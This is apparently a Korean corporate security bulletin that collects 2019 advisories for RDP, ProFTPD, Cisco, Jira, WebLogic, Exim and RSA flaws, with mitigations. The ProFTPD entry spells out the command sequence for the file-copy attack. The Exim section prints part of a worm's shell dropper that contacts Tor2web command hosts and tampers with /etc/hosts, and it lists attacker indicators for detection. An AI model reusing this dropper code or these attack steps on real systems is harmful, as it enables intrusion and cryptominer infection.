해외 보안 트렌드

요약

- 8월 정기 패치 중 원격 데스크톱 서비스 관련 총 7개 취약점 패치 발표

- 7가지의 RDP 관련 취약점을 통틀어 "Seven Monkeys/ DejaBlue"로 칭함

- 특징 : RDP 프로토콜 자체에 영향을 미치지 않으나, 구)Terminal Service였던 Remote Desktop Service내 취약점이 존재

- 영향성 : 해당 취약점들을 이용한 공격은 현재까지 없음.

CVE-2019-1181, CVE-2019-1182 : 대부분의 윈도우 버전 해당

CVE-2019-1222, CVE-2019-1226 : Windows 10, Windows Server Edition 해당

(1) CVE-2019-1181, CVE-2019-1182 - Wormable 모든 윈도우 버전 해당

- 취약점 : Remote Desktop Service(구, Terminal Service)에 취약점이 존재해, 특수하게 가공된 Request를 목표 RDP에 보낼 시 

             비인가 원격 공격자가 임의의 코드를 실행 할 수 있음

             공격자는 프로그램 설치/데이터 보기, 수정, 삭제/모든 사용자 권한을 가진 새로운 계정을 생성할 수 있음.

- 취약점 이용 공격 가능성 : 높음

- CVE Base Score : 9.8

- 영향 받는 제품 : Windows 10, Windows 7 (RDP 8.0, RDP 8.1이 설치된 경우), Windows 8.1, Windows RT 8.1, 

                        Windows Server 2008 R2(RDP 8.0, RDP 8.1이 설치된 경우), Windows Server 2012, 

                        Windows Server 2012 R2, Windows Server 2016, Windows Server 2019, Windows Server version 1803, 

                        Windows Server version 1903 

- 대응방안 : 신속한 패치 필요. RDP 사용을 하지 않을 경우 Disable로 설정 

- 차선책 : 

1) Windows 7, Windows Server 2008, Windows Server 2008 R2 경우

   네트워크 레벨 인증(Network Level Authentication(NLA)) Enable로 설정

2) 방화벽에서 TCP 3389 포트 Block 설정

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1181

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1182

(2) CVE-2019-1222, CVE-2019-1226

- 취약점 : Remote Desktop Service(구, Terminal Service)에 취약점이 존재해, 특수하게 가공된 Request를 목표 RDP에 보낼 시 

             비인가 원격 공격자가 임의의 코드를 실행 할 수 있음

       공격자는 프로그램 설치/데이터 보기, 수정, 삭제/모든 사용자 권한을 가진 새로운 계정을 생성할 수 있음.

- 영향 받는 제품 : Windows 10, Windows Server 2019, Windows Server version 1803, Windows Server version 1903 

- 대응 방안 : 신속한 패치 필요

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1222

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1226

(3) 추가 RDP 취약점: 

- CVE-2019-1223 : DoS

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1223

- CVE-2019-1224, CVE-2019-1225 : 메모리의 콘텐츠 노출

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1224

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1225

관련 CVE정보

- CVE-2019-1181, CVE-2019-1182, CVE-2019-1222, CVE-2019-1226, CVE-2019-1223, CVE-2019-1224, CVE-2019-1225

영향성

     해당 제품 사용 그룹사는 신속한 패치 필요

참고자료

출처 : https://thehackernews.com/2019/08/windows-rdp-wormable-flaws.html 

   https://www.zdnet.com/article/microsoft-august-2019-patch-tuesday-fixes-93-security-bugs/

요약

- 취약점 : mod_copy 모듈에 취약점이 존재. 인가받은 사용자가(anonymous user 포함) 쓰기 권한 없이도 

             임의의 파일을 복사해(CPFR) FTP 서버에 새로운 파일을 생성(CPTO)을 할 수 있음.

             (공격 실패 시에는 서비스 거부 상태를 초래)

- 취약원인 : SITE CPFR과 SITE CPTO 명령어의 버그로 인해 “Limit WRITE” denyall을 무시하게 되어 발생

- 선행조건 : 

(1) 공격자는 ProFTPD 서버에 사용자 또는 anonymous user로 접속 필요.

(2) mod_copy 모듈이 enabled 되어 있어야 함   (*초기 설정은 대부분 enabled 임)

(3) 웹 서버에서 FTP 디렉토리 접근이 가능해야 함

- 공격예시 :

> ftp접속

> user 도는 anonymous로 로그인 (anonymous로 로그인 시 DenyAll조건으로 인해 파일 업로드가 불가능해야 함.)

> site cpfr welcome.msg

> site cpto malicious.php

welcome.msg의 내용을 malicious.php에 복사해 새 파일을 생성 가능.

- 영향 받는 제품 :  ProFTPD 1.3.6 버전을 포함한 모든 버전

  (단, 1.3.6 버전의 경우 2019.7.17일 이전에 컴파일된 소스나, 바이너리로 설치가 된 경우 취약함)

- 공식 대응법 : 취약점에 대한 패치 실시 (공식 패치는 2019.7.17일 발표되었으며, 백포팅 실시 됨, 취약점을 개선한 최신 버전은 아직 발표되지 않음)

- 임시 대응법 : mod_copy 모듈을 disable로 설정

- 영향성 : 공격 성공을 위한 선행 조건이 다수 존재해, 위험성이 낮아 보이나, 해당 취약점이 악용될 소지가 많음. 

             공격자가 접근 가능한 ProFTPD 서버에 파일을 지속적으로 복제하며 이를 저장소로 악용 가능하며, 

             원격 코드 실행 공격 등에도 악용될 수 있음. 

관련 CVE정보

-  CVE-2019-12815

-  CVSS 3.0 Base Score: 9.8

-  PoC : 현재 없음(2019.07.24 16:05)

-  CVE-2015-3306과 연관성 있음 

   *CVE-2015-3306: 원격공격자가 SITE CPFR, SITE CPTO 명령어를 이용해 임의의 파일을 읽고 쓸 수 있음.

참고자료

출처 : https://www.bleepingcomputer.com/news/security/proftpd-vulnerability-lets-users-copy-files-without-permission/

         https://thehackernews.com/2019/07/linux-ftp-server-security.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Cyber+Security+Blog%29

         http://bugs.proftpd.org/show_bug.cgi?id=4372

요약

- 취약점 : 

         Cisco Vision Dynamic Signage Director의 REST API 인터페이스의 취약점으로 인해 비인가 원격 공격자가 취약 시스템의 인증을 우회할 수 있음.

         공격자는 특수하게 가공된 HTTP 요청을 취약 시스템에 전송하여, 공격 성공 시 REST API를 통해 관리자 권한으로 임의의 행위(action)을 할 수 있음.

        * REST API 의 기본적으로 사용가능(enabled)로 설정 되어 있으며, 사용불가능으로 설정 변경이 불가능함.

- 취약원인 : HTTP 요청에 대한 미흡한 검증

- 영향 받는 제품 : 

Cisco Vision Dynamic Signage Director 6.1

Cisco Vision Dynamic Signage Director 6.0

Cisco Vision Dynamic Signage Director 5.0

Cisco Vision Dynamic Signage Director 5.0 이하 버전

- 공식 대응법 : 취약한 버전에 대한 패치 

Cisco Vision Dynamic Signage Director 6.1   → 6.1 sp3

Cisco Vision Dynamic Signage Director 6.0   → 6.1 sp3로 마이그레이션

Cisco Vision Dynamic Signage Director 5.0   → 5.0 sp9

Cisco Vision Dynamic Signage Director 5.0 이하 버전 → 5.0.sp9로 마이그레이션

- 임시 대응법 : 현재 없음

관련 CVE정보

- CVE-2019-1917

- CVSS 3.0 Base Score: 9.1

- PoC : 현재 없음 (2019.07.18 14:30)

참고자료

출처 : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-cvdsd-wmauth

요약

- 취약점 : ContactAdministratos, SendBulkMail 액션에 서버 사이드 템플릿 삽입 취약점 존재. 공격자는 취약한 jira 시스템에 원격으로 코드를 실행 할 수 있음

- 선행조건 : 

(1) SMTP 서버가 Contact Administrators Form 설정이 Enable → 인증 없이 공격 가능

(2) 공격자가 Jira Administrator 접근 가능 → 인가된 사용자로 공격 가능

- 영향 받는 제품 : 

Jira Server, Data Center version  4.4.0 - 7.6.14, 

Jira Server, Data Center version  7.7.0-7.13.5

Jira Server, Data Center version  8.0.0-8.0.3

Jira Server, Data Center version  8.1.0 - 8.1.2

(Jira Software, Jira Core, Jira Service Desk 또한 영향 받음/ Jira Cloud 경우 안전)

제품 리스트 참고 : https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html

- 공식 대응법 : 취약한 버전에 대한 패치 필요 (7.6.14, 7.13.5, 8.0.3, 8.1.2, 8.2.)

- 임시 대응법 : 

      (1) Contact Administrator Form 설정 – Disable

          설정 > 시스템 > 일반 설정 > 설정 변경 > Contact Administrator From 설정 Off > 하단 업데이트 버전 클릭으로 설정 적용

      (2) 엔드포인트의 /secure/admin/SendBulkMail!default.jspa 접근 제한 : reverse-proxy, load balancer, Tomcat에서 접근 제한 설정

       * SendBulkMail 자체 접근을 제한할 시 Jira admin이 사용자들에게 벌크 이메일 전송이 불가능하게 됨.

       Jira 업그레이드 후, Adminstrator Contact Form 재 설정 및 SendBulkMail의 접근 제한을 해제 할 수 있음

관련 CVE정보

- CVE-2019-11581

- CVSS 3.0 Base Score: 8.1

- PoC : 현재 없음 (2019.07.12 10:30)

(현재 공식 PoC는 존재 하지 않으나 과거 Atlassian 발견 취약점(CVE-2019-3395,CVE-2019-3396)에 대한 PoC가 취약점 발표 후 오래지 않아 발표된 것처럼 jira 취약점 PoC도 곧 나타날 것으로 예상)

영향성

CVE-2019-2725에 대한 패치가 적용 되었더라고 공격이 가능함으로, 신속한 임시 대응 조치가 필요함.

참고자료

출처 : https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html

https://www.tenable.com/blog/cve-2019-11581-critical-template-injection-vulnerability-in-atlassian-jira-server-and-data?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+tenable%2FqaXL+%28Tenable+Network+Security+Blog%29

요약

 Cybersecurity and Infrastructure Security Agency(CISA) 에서 CVE-2019-0708 Windows 2000 버전 공격이 가능한 Exploit을 만듦.

<현재까지 알려지 취약 OS 버전>

32/64 bit 무관, Service Pack 버전 무관하게 아래의 OS  버전이 취약함 .

• Windows 2000  *추가 됨 
• Windows Vista  *추가 됨
• Windows XP
• Windows 7
• Windows Server 2003
• Windows Server 2003 R2
• Windows Server 2008
• Windows Server 2008 R2

- Windows 2000의 경우 패치가 없으므로, 업그레이드 권고

참고자료

https://www.us-cert.gov/ncas/alerts/AA19-168A

요약

- 취약점 : Alibaba Cloud 보안팀이 CVE-2019-2725 패치의 취약점 발견. 

             공격자는 CVE-2019-2725 패치를 우회해 임의의 코드 실행이 가능함. 현재 해당 공격이 활발히 이루어지고 있음.

- 취약원인 : Weblogic을 서포트 하는 JDK 버전에 취약점 존재.

- 영향 받는 제품 : 

Oracle WebLogic Server 10.3.6.0.0, 

Oracle WebLogic Server 12.1.3.0.0

- 공식 대응법 : 6/12일 Oracle은 취약점에 대해 공식적으로 확인하였으나 대응법을 발표 하지 않음

- 임시 대응법 :

방법1) wls9_async_response.war, wls-wsat.war 파일을 찾아 삭제 후 Weblogic 서비스를 재 시작.

   (wls9_async_response.war, wls-wsat.war 파일을 직접적으로 사용하지 않는 경우 추천)

<파일경로>

 10.3.X 버전:

 \Middleware\wlserver_10.3\server\lib\

 %DOMAIN_HOME%\servers\AdminServer\tmp\_WL_internal\

 %DOMAIN_HOME%\servers\AdminServer\tmp\.internal\

12.1.3 버전 :

\Middleware\Oracle_Home\oracle_common\modules\

 %DOMAIN_HOME%\servers\AdminServer\tmp\.internal\

 %DOMAIN_HOME%\servers\AdminServer\tmp\_WL_internal\

방법2) /_async/* 와 /wls-wsat/* 경로의 URL 접근을 제한.

 -> 비지니스 시스템 작동에 문제를 일으킬 수 있으므로, whitelist 기반 특정 사용자만 접근이 가능하도록 정책 변경.

방법3) Weblogic 지원 Java 버전 업그레이드

관련 CVE정보

-  CNNVD-201906-596 (중국 NISVL 지정)

-  PoC : 현재(2019.06.18 16:00) 없음.

영향성

CVE-2019-2725에 대한 패치가 적용 되었더라고 공격이 가능함으로, 신속한 임시 대응 조치가 필요함.

참고자료

출처 : https://medium.com/@knownsec404team/knownsec-404-team-alert-again-cve-2019-2725-patch-bypassed-32a6a7b7ca15

https://read01.com/oAONReQ.html#.XQiB-1Uzb28

https://4hou.win/wordpress/?cat=20

https://www.anquanke.com/post/id/180390

요약

- 6/3일 발표된 CVE-2019-10149 취약점을 이용해 WannaMine 공격에 사용되었던 가상화폐 채굴기를 설치하는 활발한 공격이 포착 됨.

- 공격 패턴 :

(1) 공격자 취약서버에 스크립트를 업로드 하고, ssh를 통해 영구적인 root 권한을 획득하고 있음.

(2) Openssh가 취약 서버에 설치 되어 있는지 확인하고, 설치 되어 있지 않을 시, openssh 및 기타 툴을 설치하는 스크립트는 

        tor2web 라우팅 서비스를 이용해 다운 받음.

(3) 스크립트는 기존/새로 설치된 openssh 설정을 WITH AN RSA PUBLIC/PRIVATE KEY AUTHENTICATION >> 과 ssh를 통해 root 로그인을 

        permit하도록 변경  → 서버 공격에 성공 시, 공격자는 private/public 키 인증을 통해 서버에 대한 root 권한 접근이 가능함.

(4) 취약점 공격 성공 후, 포트 스캐너를 실행해 추가 감염 시스템을 검색 함 (python으로 쓰여 짐)

(5) 최종 공격 단계에서 윈도우 아이콘 파일을 다운로드 함 : 실제는 zip 압축 파일로 “no-password”암호가 걸려 있음. 

        압축 해제 시 가상화폐 채굴기 존재.

- 이미 설치된 가상 화폐 채굴기 및 보안 시스템을 제거 후 공격자의 가상화폐 채굴기를 설치

- 윈도우 아이콘 : Github 공식 아이콘과 유사

- 탐지 방법 

(1) 공격자 사용 TOR 히든 서비스 : an7kmd2wp4xo7hpr

(2) 공격자 사용 private 키 : 

AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost"

(3) kthrotlds 프로세서가 서버에서 실행 중 인지 확인

→ 프로세서는 다양한 경로에 악성 코드 설치 및 이전 cron 테스크를 지우기 때문에 백업으로 복구 필요

(악성 코드)

#!/bin/sh

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

RHOST=”https://an7kmd2wp4xo7hpr”

TOR1=”.tor2web.su/”

TOR2=”.tor2web.io/”

TOR3=”.onion.sh/”

RPATH1=’src/ldm’

#LPATH=”${HOME-/tmp}/.cache/”

TIMEOUT=”75″

CTIMEOUT=”22″

COPTS=” -fsSLk –retry 2 –connect-timeout ${CTIMEOUT} –max-time ${TIMEOUT} ”

WOPTS=” –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=${CTIMEOUT} –timeout=${TIMEOUT} ”

tbin=$(command -v passwd); bpath=$(dirname “${tbin}”)

curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi

wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “.wgetrc’-style command” && wget=”$f” && break; done; fi; fi

#CHKCURL=’curl=”curl “; wget=”wget “; if [ “$(whoami)” = “root” ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl=”echo “; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget=”echo “; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; fi; ‘

CHKCURL=’tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to ” && wget=”$f” && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; ‘

LBIN8=”kthrotlds”

null=’ >/dev/null 2>&1′

(4) Crontab 에서 새롭게 추가된 cronjob이 있는지 확인 후 제거 : 공격 단계별로 다 수의 페이로드를 cronjob을 통해 다운받기 때문에 

        반드시 확인 필요

(5) F/W과 Access 로그에서 아래 호스트에 대한 접근 확인

https://an7kmd2wp4xo7hpr.tor2web.su

https://an7kmd2wp4xo7hpr.tor2web.io

https://an7kmd2wp4xo7hpr.onion.sh

(6) 공격자는 [http://173.212.214.137/s] 에서 스크립트를 다운받으라고 시도 함.

[Exim 원격 명령어(Command) 실행 취약점(CVE-2019-10149)]

- 취약점 : 6/3일 Qualys 회사가 메일 전송 에이전트(mail transfer agent, MTA)로 알려진 Exim에 원격 코드 실행 취약점이 존재하는 것을 발견.

- 로컬 공격 : 로컬 공격자는 root 권한으로 임의의 명령어를  execv( )를 이용해 실행 할 수 있음 

                      (메모 변질 또는ROP (Return-Oriented Programming)와 연관성 없음)

공격자는 deliver_message( )함수 내 expand_string 함수가 해석할 특수하게 가공된 로컬 호스트의 메일 주소로 메일을 보내 

root권한으로 명령어를 즉시 실행 할 수 있음. 

*ROP(Return-Oriented Programming) : 취약한 프로그램 내부에 있는 기계어 코드 Gadget을 이용하여 BOF 공격 시 특정 명령을 실행시키는 방법으로 메모리 보호기법을 우회할 수 있는 공격 방법.

- 원격 공격 : 

(1) 초기 설정 값 유지  : 원격 공격도 기능하나 공격자가 취약한 서버에 7일 이상 접속을 유지하고 있어야 하므로,  

                                  현실적으로 불가능할 것으로 추정.

(2) 초기 설정 값 유지 X : 아래의 경우, 로컬 공격 방법으로 원격 공격이 가능함

① 초기 설정 파일(src/configure.default)에서 ‘verify = recipient’ ACL 이 제거 된 경우

② userforward 라우터 아래의 'local_part_suffix = + * : - *'주석을 제거한 경우

③ Exim이 보조 MX (Mail eXchange)로  원격 도메인 주소에 메일을 전달하게 설정 된 경우

- 영향받는 제품 : Exim 버전 4.87  ~ 4.91 을 사용하는 오픈소스 운영체제 (ex. Debian, Red Hat, Ubuntu 등)

- 대응방안 : 4.92 버전으로 업그레이드 또는 각 버전별 패치 적용.

- 영향성 : Shodan 검색 결과 410만대의 시스템에 취약함 (Exim 사용 시스템 중 약 90%의 시스템이 취약)

관련 CVE정보

- CVE-2019-10149

- CVSS 3.0 Base Score: 9.8

- PoC : 현재(2019.06.14 10:00) 없음 *자세한 취약 요소에 대해서는 최초 분석글에서 확인 가능

    (https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt)

탐지룰 존재유무

- TippingPoint : 35520: SMTP: Exim Internet Mailer Command Injection Vulnerability

참고자료

탐지방법/대응법 : https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability

      https://www.srv24x7.com/kthrotlds-cve-2019-10149-exim/

출처 : https://www.tenable.com/blog/cve-2019-10149-critical-remote-command-execution-vulnerability-discovered-in-exim

        https://www.openwall.com/lists/oss-security/2019/06/05/4

        https://www.exim.org/static/doc/security/CVE-2019-10149.txt

        https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt

요약

- 취약점 : 사용자의 인증값에 대한 검증이 미흡해 취약점 존재. 

             비인가 원격 공격자가 특수하게 가공한 인수를 전송해 서버에 임의의 코드를 실행 할 수 있음

- 영향 받는 제품 : 

RSA Security Analytics 버전 10 : 10.6.6.0 이하 제품

RSA NetWitness Platform 버전 11 : 11.2.1.0 이하 제품 

- 대응방안 : 

RSA Security Analytics 버전 10 : 10.6.6.1 로 패치 

RSA NetWitness Platform 버전 11 : 11.2.1.1 로 패치 

관련 CVE정보

- CVE-2019-3725

- CVSS Base Score: 9.8

- PoC : 현재 없음

영향성

해당 버전 사용 그룹사는 신속한 패치 필요 

참고자료

출처 : https://community.rsa.com/docs/DOC-104202

        https://www.securityfocus.com/bid/108355